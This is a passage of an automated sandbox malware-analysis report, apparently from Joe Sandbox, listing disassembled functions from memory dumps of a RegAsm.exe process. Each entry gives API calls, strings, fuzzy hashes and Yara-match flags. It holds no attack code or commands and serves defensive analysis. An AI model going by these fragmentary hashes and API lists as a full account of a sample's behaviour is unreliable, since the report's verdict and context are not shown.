Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: c8a643205c9b9f3c65f47d5ea9b7885ca4b64f550a4b554db0aa341190c5fc33
Instruction ID: a940bd19394b475a85dcea86555cdf0e7a43a8c5e3d5d29541b52c4858848f68
Opcode Fuzzy Hash: c8a643205c9b9f3c65f47d5ea9b7885ca4b64f550a4b554db0aa341190c5fc33
Instruction Fuzzy Hash: E9311A35300600CFD710CF29C998E6ABBF9FF89319BA48558E5568B795CB39EC41CB94

Function 6C2AB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C2AB532
moz_xmalloc.MOZGLUE(?), ref: 6C2AB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C2AB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C2AB57E
free.MOZGLUE(00000000), ref: 6C2AB58F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 21326dd7218e5ea9532e10bda108ebb819cfc5c7f90c8db928cc266428a2df8d
Instruction ID: f0ed7d55bafefe079cf8ef801a99d24a4c730933b69420e2af9b1d027cc3e6b1
Opcode Fuzzy Hash: 21326dd7218e5ea9532e10bda108ebb819cfc5c7f90c8db928cc266428a2df8d
Instruction Fuzzy Hash: 7321B671A0020E9BDB008FA5CC40BAABBB9FF46314F244129ED18DB341E775D912C7A1

Function 6C2AB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C2AB7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C2AB808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C2AB82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C2AB840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2AB849

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: 08ec61c846c54e7261ac1a2d6f270aa294b91d57a9a5f05e8b4c9f53072c6bfb
Instruction ID: 549cf59602417fd3143d09a91c65faa466d47f46b92b3c652038f4be27f4dcda
Opcode Fuzzy Hash: 08ec61c846c54e7261ac1a2d6f270aa294b91d57a9a5f05e8b4c9f53072c6bfb
Instruction Fuzzy Hash: FE214BB0E002099FDF04DFA9D8855FEBBB8EF49314F148129ED45A7301E735A949CBA1

Function 6C306E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C306E78

Part of subcall function 6C306A10: InitializeCriticalSection.KERNEL32(6C32F618), ref: 6C306A68
Part of subcall function 6C306A10: GetCurrentProcess.KERNEL32 ref: 6C306A7D
Part of subcall function 6C306A10: GetCurrentProcess.KERNEL32 ref: 6C306AA1
Part of subcall function 6C306A10: EnterCriticalSection.KERNEL32(6C32F618), ref: 6C306AAE
Part of subcall function 6C306A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C306AE1
Part of subcall function 6C306A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C306B15
Part of subcall function 6C306A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C306B65
Part of subcall function 6C306A10: LeaveCriticalSection.KERNEL32(6C32F618,?,?), ref: 6C306B83

MozFormatCodeAddress.MOZGLUE ref: 6C306EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C306EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C306EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C306EFF

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 2f1c01b0a2b58c69e9c4be52a08d8dae763bf37a612d3a843eb4d0beb9242a6e
Instruction ID: ff60310eff0a9cf0077859cc61c2d9f8f6d7cf8423af4aa35e8c246b65be3bd0
Opcode Fuzzy Hash: 2f1c01b0a2b58c69e9c4be52a08d8dae763bf37a612d3a843eb4d0beb9242a6e
Instruction Fuzzy Hash: 3421B0B1A0421A9FCF10CF29D8856DA77F8EF84308F04403DE84997240EB349A888F92

Function 6C309B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C309B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C309BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C309BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C309BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6C309BE0

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: 1e8f43200900c7c02892cca71621770dd402dcea5cffd1d216f7a4898d93b089
Instruction ID: dd6b999a473080030ddf406593c113f2ed457284482e94543bc9069242d93205
Opcode Fuzzy Hash: 1e8f43200900c7c02892cca71621770dd402dcea5cffd1d216f7a4898d93b089
Instruction Fuzzy Hash: 35117072A18748A787009F688C5189BB7BCFFC6368F008A0DF99546641DB319548CBA2

Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(01343050,?,?,?,0041140C,?,01343050,00000000), ref: 0041926C
lstrcpyn.KERNEL32(0064AB88,01343050,01343050,?,0041140C,?,01343050), ref: 00419290
lstrlenA.KERNEL32(?,?,0041140C,?,01343050), ref: 004192A7
wsprintfA.USER32 ref: 004192C7

Strings

%s%s, xrefs: 004192B5

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95

Function 6C2E0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C2A3DEF), ref: 6C2E0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C2A3DEF), ref: 6C2E0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C2A3DEF), ref: 6C2E0DAF

Strings

<jemalloc>, xrefs: 6C2E0D92, 6C2E0DB9
: (malloc) Error in VirtualFree(), xrefs: 6C2E0D97, 6C2E0DBE

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: e9cf8caac1938474dcdf2ace4eaf4458355f5b84cb6f47cf4defcceafc3ca727
Instruction ID: d5bdb0b7b639d7a7c8725401a1b68b2e4bd452514a9feaad54963afd0eb72731
Opcode Fuzzy Hash: e9cf8caac1938474dcdf2ace4eaf4458355f5b84cb6f47cf4defcceafc3ca727
Instruction Fuzzy Hash: F8F0BB3539039D22DA3012664C05F56255DE7C5B15F644025FB05EE984DE54E802ABA5

Function 6C305850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C30586C
CloseHandle.KERNEL32 ref: 6C305878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C305898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C3058C9
free.MOZGLUE(00000000), ref: 6C3058D3

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 6928c133f05f00bfa470dd12351ef1f47705195972615989ec98797ca1471f64
Instruction ID: d6cb0adb7f395e814e02927b58bf05b452672a05fa63dfddd7224aba0d1092ee
Opcode Fuzzy Hash: 6928c133f05f00bfa470dd12351ef1f47705195972615989ec98797ca1471f64
Instruction Fuzzy Hash: 0C014F727041219BDF00DF16D8086467BBCFB8B329734423DE51AD2210D73AD8158F99

Function 6C2F7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C2F75C4,?), ref: 6C2F762B

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C2F74D7,6C3015FC,?,?,?), ref: 6C2F7644
GetCurrentThreadId.KERNEL32 ref: 6C2F765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C2F74D7,6C3015FC,?,?,?), ref: 6C2F7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C2F74D7,6C3015FC,?,?,?), ref: 6C2F7677

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 2478ee1e0bdf33980ac690c5290554512b56992debf6e5db553d87c12a7eeacc
Instruction ID: f661bb9b0f52bf1fa9a6507244479cd3775c10f9a7fa65c9e7aba3432335ff66
Opcode Fuzzy Hash: 2478ee1e0bdf33980ac690c5290554512b56992debf6e5db553d87c12a7eeacc
Instruction Fuzzy Hash: 9AF0AF71E10745ABDB008F21D888676B778FFEA259F21431AF90556601E7B4A5D08BD0

Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C74E

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__getptd.LIBCMT ref: 0041C765
__amsg_exit.LIBCMT ref: 0041C773
__lock.LIBCMT ref: 0041C783
__updatetlocinfoEx_nolock.LIBCMT ref: 0041C797

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 3d7c1e79db36087730c99ab0a6624c72b46b4ffdd1162626bf4921dca9482436
Instruction ID: 8b8854a621eee9d40ba0401ebc9f05e8605540fb6beb74f1d93a4957509c98f2
Opcode Fuzzy Hash: 3d7c1e79db36087730c99ab0a6624c72b46b4ffdd1162626bf4921dca9482436
Instruction Fuzzy Hash: 1AF09632A817119BD7207BB95C867DE33A09F00728F24414FF414A62D2CBAC59D28E9E

Function 6C301700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C301800

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

Part of subcall function 6C2A4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C2E3EBD,6C2E3EBD,00000000), ref: 6C2A42A9

Strings

{marker.name} - {marker.data.name}, xrefs: 6C3018C7
name, xrefs: 6C301939
Details, xrefs: 6C301925

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 2fb4241e229f5f8e57da12d4962037e11e79363bc008d25857b98cb560557a40
Instruction ID: 19c0526b07084e8c1cb35a382537fd497a8dd3d6b2b8cff256204ef691c74fb8
Opcode Fuzzy Hash: 2fb4241e229f5f8e57da12d4962037e11e79363bc008d25857b98cb560557a40
Instruction Fuzzy Hash: 5771DDB1A0074A9FCB04DF68C450A9ABBB5FF89304F14466DD8194BB41DB74E698CBE2

Function 6C30B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C30B0A6,6C30B0A6,?,6C30AF67,?,00000010,?,6C30AF67,?,00000010,00000000,?,?,6C30AB1F), ref: 6C30B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C30B0A6,6C30B0A6,?,6C30AF67,?,00000010,?,6C30AF67,?,00000010,00000000,?), ref: 6C30B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C30B0A6,6C30B0A6,?,6C30AF67,?,00000010,?,6C30AF67,?,00000010), ref: 6C30B25F

Strings

map/set<T> too long, xrefs: 6C30B1FA

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 0f04147cc34a574bc935c626986b09d562d9768300ed1ab3cbd7e7dfd57d7c52
Instruction ID: 9b785f885e3969b9aa27fd5ffa2264c7e06d66c64020e2f6e58cb20fdf1ca5a4
Opcode Fuzzy Hash: 0f04147cc34a574bc935c626986b09d562d9768300ed1ab3cbd7e7dfd57d7c52
Instruction Fuzzy Hash: EF617735B042498FD705CF19C880A9ABBE5BF4A318F18C5A9D8598FB52C332E845CFA1

Function 6C2CD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

EnterCriticalSection.KERNEL32(6C32E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD4F2
LeaveCriticalSection.KERNEL32(6C32E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD50B

Part of subcall function 6C2ACFE0: EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2ACFF6
Part of subcall function 6C2ACFE0: LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2AD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD52E
EnterCriticalSection.KERNEL32(6C32E7DC), ref: 6C2CD690
LeaveCriticalSection.KERNEL32(6C32E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C2DD1C5), ref: 6C2CD751

Strings

MOZ_CRASH(), xrefs: 6C2CD4BB

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: ed1b4895e67aba23c856db9ffe11f6cb411a24d5e87151fd2bec71d1d0bda250
Instruction ID: d8afc075b8bc1ec4b9b376d4ae982783baa2de31c25ab79f3c65d9418367125b
Opcode Fuzzy Hash: ed1b4895e67aba23c856db9ffe11f6cb411a24d5e87151fd2bec71d1d0bda250
Instruction Fuzzy Hash: 6C511471B047058FD754CF28C19071AB7E5FB89704F254A2EE9AAC7B84D734E800CB82

Function 6C2F4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C2F4721

Strings

-%llu, xrefs: 6C2F4733
., xrefs: 6C2F476A
profiler-paused, xrefs: 6C2F46E4

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: d420bc9150944073631b5326260b46d211a106d04890eb37a8140ed0ea76e469
Instruction ID: a1893f6fc124d95339863503ec02af1526325178cd1326f5ca95a5bbc88fb335
Opcode Fuzzy Hash: d420bc9150944073631b5326260b46d211a106d04890eb37a8140ed0ea76e469
Instruction Fuzzy Hash: 72414571A0870C9FCB08DF78E95219EFBE9EB85744F10862DFD65ABB41EB7098058741

Function 6C319830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C31985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C31987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C3198DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C3198D9

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 85a7e8e0130449544a830bf7915378fd35f119902155504ac739bb033d5eda04
Instruction ID: 07ec062406ac4d7f6e88d6266967efb5cf0ce89787825cb6331e8401432da81e
Opcode Fuzzy Hash: 85a7e8e0130449544a830bf7915378fd35f119902155504ac739bb033d5eda04
Instruction Fuzzy Hash: 1C3135B1B0020C5FDF04AF59D8109EEB7A8DF88718F50802DEE1A9BB40CB35A9058BE1

